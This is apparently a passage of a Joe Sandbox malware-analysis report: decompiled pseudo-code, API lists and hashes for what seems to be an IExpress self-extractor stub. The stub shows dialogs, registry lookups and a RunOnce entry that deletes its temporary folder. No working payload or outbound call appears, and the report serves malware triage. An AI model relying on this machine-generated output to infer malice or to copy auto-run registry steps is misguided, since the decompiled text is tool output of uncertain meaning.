                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 000C2DAE
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 000C2DBD
                                                                                                                                                                                                        • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 000C2E0A
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                        • API String ID: 1002816675-2654900392
                                                                                                                                                                                                        • Opcode ID: 7b1fe9555b1d4c25e045cb41d5e3a97ad8e996658fc886479285938d15b4dbc2
                                                                                                                                                                                                        • Instruction ID: b6daed97b61684ed9727d58fd025b0b4867d786473d4704a896bcc5128790d41
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b1fe9555b1d4c25e045cb41d5e3a97ad8e996658fc886479285938d15b4dbc2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5051E370340305ABF764AB218C4AFBF36D8EB86704F14803DBA41E59E2DAB8C841C726
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                                                        			E000C34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				struct HWND__* _t35;
                                                                                                                                                                                                        				struct HWND__* _t38;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t9 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t9 == 0) {
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					 *0xc91d8 = 1;
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                                        					L21:
                                                                                                                                                                                                        					EndDialog();
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				_pop(1);
                                                                                                                                                                                                        				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                        					if(_a12 != 0x1b) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t13 = _t12 - 0xe;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t35 = _a4;
                                                                                                                                                                                                        					 *0xc8584 = _t35;
                                                                                                                                                                                                        					E000C43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                        					__eflags =  *0xc8184; // 0x1
                                                                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                        					_t17 = CreateThread(0, 0, E000C4FE0, 0, 0, 0xc8798);
                                                                                                                                                                                                        					 *0xc879c = _t17;
                                                                                                                                                                                                        					__eflags = _t17;
                                                                                                                                                                                                        					if(_t17 != 0) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						E000C44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t35);
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t23 = _t13 - 1;
                                                                                                                                                                                                        				if(_t23 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 2;
                                                                                                                                                                                                        					if(_a12 != 2) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					ResetEvent( *0xc858c);
                                                                                                                                                                                                        					_t38 =  *0xc8584; // 0x0
                                                                                                                                                                                                        					_t25 = E000C44B9(_t38, 0x4b2, 0xc1140, 0, 0x20, 4);
                                                                                                                                                                                                        					__eflags = _t25 - 6;
                                                                                                                                                                                                        					if(_t25 == 6) {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						 *0xc91d8 = 1;
                                                                                                                                                                                                        						SetEvent( *0xc858c);
                                                                                                                                                                                                        						_t39 =  *0xc879c; // 0x0
                                                                                                                                                                                                        						E000C3680(_t39);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t25 - 1;
                                                                                                                                                                                                        					if(_t25 == 1) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetEvent( *0xc858c);
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t23 == 0xe90) {
                                                                                                                                                                                                        					TerminateThread( *0xc879c, 0);
                                                                                                                                                                                                        					EndDialog(_a4, _a12);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000), ref: 000C3535
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 000C3541
                                                                                                                                                                                                        • ResetEvent.KERNEL32 ref: 000C355F
                                                                                                                                                                                                        • SetEvent.KERNEL32(000C1140,00000000,00000020,00000004), ref: 000C3590
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 000C35C7
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 000C35F1
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 000C35F8
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 000C3610
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 000C3617
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 000C3623
                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 000C3637
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 000C3671
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 2406144884-3940384054
                                                                                                                                                                                                        • Opcode ID: 0115ebd362917fd9e29fbcb39b394d2ac0b33ecf99883be528f81f3fc3a30351
                                                                                                                                                                                                        • Instruction ID: f587c8564049820cce4bfb7b8f8b98fea205f38d61f1e240b910546380c1acce
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0115ebd362917fd9e29fbcb39b394d2ac0b33ecf99883be528f81f3fc3a30351
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E131B031250304BBE7601F29EC4DF6F3AA8E786B05F18C52DFA02952E1CA798A00DB55
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                        			E000C4224(char __ecx) {
                                                                                                                                                                                                        				char* _v8;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				char* _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				char* _t61;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				char* _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                        				char _t76;
                                                                                                                                                                                                        				intOrPtr _t85;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t67 = __ecx;
                                                                                                                                                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                        				if(_t66 == 0) {
                                                                                                                                                                                                        					_t63 = 0x4c2;
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					E000C44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                        				_v12 = _t26;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t63 = 0x4c1;
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                        				_v20 = _t28;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                        				_v16 = _t29;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t76 =  *0xc88c0; // 0x0
                                                                                                                                                                                                        				if(_t76 != 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					 *0xc87a0 = 0;
                                                                                                                                                                                                        					_v52 = _t67;
                                                                                                                                                                                                        					_v48 = 0;
                                                                                                                                                                                                        					_v44 = 0;
                                                                                                                                                                                                        					_v40 = 0xc8598;
                                                                                                                                                                                                        					_v36 = 1;
                                                                                                                                                                                                        					_v32 = E000C4200;
                                                                                                                                                                                                        					_v28 = 0xc88c0;
                                                                                                                                                                                                        					 *0xca288( &_v52);
                                                                                                                                                                                                        					_t32 =  *_v12();
                                                                                                                                                                                                        					if(_t71 != _t71) {
                                                                                                                                                                                                        						asm("int 0x29");
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_v12 = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						 *0xca288(_t32, 0xc88c0);
                                                                                                                                                                                                        						 *_v16();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *0xc88c0 != 0) {
                                                                                                                                                                                                        							E000C1680(0xc87a0, 0x104, 0xc88c0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xca288(_v12);
                                                                                                                                                                                                        						 *_v20();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t85 =  *0xc87a0; // 0x0
                                                                                                                                                                                                        					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					GetTempPathA(0x104, 0xc88c0);
                                                                                                                                                                                                        					_t61 = 0xc88c0;
                                                                                                                                                                                                        					_t4 =  &(_t61[1]); // 0xc88c1
                                                                                                                                                                                                        					_t65 = _t4;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t42 =  *_t61;
                                                                                                                                                                                                        						_t61 =  &(_t61[1]);
                                                                                                                                                                                                        					} while (_t42 != 0);
                                                                                                                                                                                                        					_t5 = _t61 - _t65 + 0xc88c0; // 0x191181
                                                                                                                                                                                                        					_t44 = CharPrevA(0xc88c0, _t5);
                                                                                                                                                                                                        					_v8 = _t44;
                                                                                                                                                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0xc88c0, _t44)) != 0x3a) {
                                                                                                                                                                                                        						 *_v8 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}




























                                                                                                                                                                                                        0x000c4307
                                                                                                                                                                                                        0x000c430e
                                                                                                                                                                                                        0x000c4315
                                                                                                                                                                                                        0x000c431c
                                                                                                                                                                                                        0x000c4322
                                                                                                                                                                                                        0x000c4326
                                                                                                                                                                                                        0x000c432d
                                                                                                                                                                                                        0x000c432d
                                                                                                                                                                                                        0x000c432f
                                                                                                                                                                                                        0x000c4334
                                                                                                                                                                                                        0x000c4343
                                                                                                                                                                                                        0x000c4349
                                                                                                                                                                                                        0x000c434d
                                                                                                                                                                                                        0x000c4354
                                                                                                                                                                                                        0x000c4354
                                                                                                                                                                                                        0x000c435d
                                                                                                                                                                                                        0x000c436e
                                                                                                                                                                                                        0x000c436e
                                                                                                                                                                                                        0x000c437d
                                                                                                                                                                                                        0x000c4383
                                                                                                                                                                                                        0x000c4387
                                                                                                                                                                                                        0x000c438e
                                                                                                                                                                                                        0x000c438e
                                                                                                                                                                                                        0x000c4387
                                                                                                                                                                                                        0x000c4391
                                                                                                                                                                                                        0x000c4399
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4295
                                                                                                                                                                                                        0x000c429f
                                                                                                                                                                                                        0x000c42a5
                                                                                                                                                                                                        0x000c42aa
                                                                                                                                                                                                        0x000c42aa
                                                                                                                                                                                                        0x000c42ad
                                                                                                                                                                                                        0x000c42ad
                                                                                                                                                                                                        0x000c42af
                                                                                                                                                                                                        0x000c42b0
                                                                                                                                                                                                        0x000c42b6
                                                                                                                                                                                                        0x000c42c2
                                                                                                                                                                                                        0x000c42c8
                                                                                                                                                                                                        0x000c42ce
                                                                                                                                                                                                        0x000c42e4
                                                                                                                                                                                                        0x000c42e4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c42ce

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 000C4236
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 000C424C
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 000C4263
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 000C427A
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,000C88C0,?,00000001), ref: 000C429F
                                                                                                                                                                                                        • CharPrevA.USER32(000C88C0,00191181,?,00000001), ref: 000C42C2
                                                                                                                                                                                                        • CharPrevA.USER32(000C88C0,00000000,?,00000001), ref: 000C42D6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 000C4391
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 000C43A5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                        • API String ID: 1865808269-1731843650
                                                                                                                                                                                                        • Opcode ID: 548a1dba8d1072784760ffaa5c2c5b7d0c7bb7f195f28504c0bd994573f5edfb
                                                                                                                                                                                                        • Instruction ID: b3160db8caa77fc3b0126d20330156f374de43fb65d4b6d3c5a6d3e4676ade32
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 548a1dba8d1072784760ffaa5c2c5b7d0c7bb7f195f28504c0bd994573f5edfb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42412470A00244AFE710AF74DCA8FAE7BB4FB46348F54416DE941A7281CF788D05C769
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E000C2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v269;
                                                                                                                                                                                                        				CHAR* _v276;
                                                                                                                                                                                                        				int _v280;
                                                                                                                                                                                                        				void* _v284;
                                                                                                                                                                                                        				int _v288;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				int _t45;
                                                                                                                                                                                                        				int* _t50;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				CHAR* _t61;
                                                                                                                                                                                                        				char* _t62;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t52 = __ecx;
                                                                                                                                                                                                        				_t23 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                        				_t62 = _a4;
                                                                                                                                                                                                        				_t50 = 0;
                                                                                                                                                                                                        				_t61 = __ecx;
                                                                                                                                                                                                        				_v276 = _t62;
                                                                                                                                                                                                        				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                        				if( *_t62 != 0x23) {
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t64 = _t62 + 1;
                                                                                                                                                                                                        					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					_t34 = _v269;
                                                                                                                                                                                                        					if(_t34 == 0x53) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 == 0x57) {
                                                                                                                                                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(_t52);
                                                                                                                                                                                                        							_v288 = 0x104;
                                                                                                                                                                                                        							E000C1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                        							_t59 = 0x104;
                                                                                                                                                                                                        							E000C658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                        								L16:
                                                                                                                                                                                                        								_t59 = _t63;
                                                                                                                                                                                                        								E000C658A(_t61, _t63, _v276);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								if(RegQueryValueExA(_v284, 0xc1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                        									_t45 = _v280;
                                                                                                                                                                                                        									if(_t45 != 2) {
                                                                                                                                                                                                        										L9:
                                                                                                                                                                                                        										if(_t45 == 1) {
                                                                                                                                                                                                        											goto L10;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        											_t45 = _v280;
                                                                                                                                                                                                        											goto L9;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t59 = 0x104;
                                                                                                                                                                                                        											E000C1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                        											L10:
                                                                                                                                                                                                        											_t50 = 1;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								RegCloseKey(_v284);
                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                        								if(_t50 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                        			}
























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharUpperA.USER32(374600BF,00000000,00000000,00000000), ref: 000C27A8
                                                                                                                                                                                                        • CharNextA.USER32(0000054D), ref: 000C27B5
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 000C27BC
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000C2829
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,000C1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000C2852
                                                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000C2870
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000C28A0
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 000C28AA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 000C28B9
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 000C27E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                        • API String ID: 2659952014-2428544900
                                                                                                                                                                                                        • Opcode ID: 9da1cebcd890e436b90913832c8f93dc16706034e32fca5b92037c9bfa95cd05
                                                                                                                                                                                                        • Instruction ID: a8bffff3d2f9fa73995c40869fe33222611d9d679f22f7a26d8ebc1b6d99e8bd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9da1cebcd890e436b90913832c8f93dc16706034e32fca5b92037c9bfa95cd05
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E541C270A0112CAFEB249B649C85FFE77BCEB16700F1440ADFA49D2141CB748E898FA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                                        			E000C2267() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v836;
                                                                                                                                                                                                        				void* _v840;
                                                                                                                                                                                                        				int _v844;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				intOrPtr* _t42;
                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t19 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                        				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                        				if( *0xc8530 != 0) {
                                                                                                                                                                                                        					_push(_t49);
                                                                                                                                                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                        						_push(_t38);
                                                                                                                                                                                                        						_v844 = 0x238;
                                                                                                                                                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                        							_push(_t47);
                                                                                                                                                                                                        							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        								E000C658A( &_v268, 0x104, 0xc1140);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                        							E000C171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                        							_t42 =  &_v836;
                                                                                                                                                                                                        							_t45 = _t42 + 1;
                                                                                                                                                                                                        							_pop(_t47);
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t33 =  *_t42;
                                                                                                                                                                                                        								_t42 = _t42 + 1;
                                                                                                                                                                                                        							} while (_t33 != 0);
                                                                                                                                                                                                        							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                        						_pop(_t38);
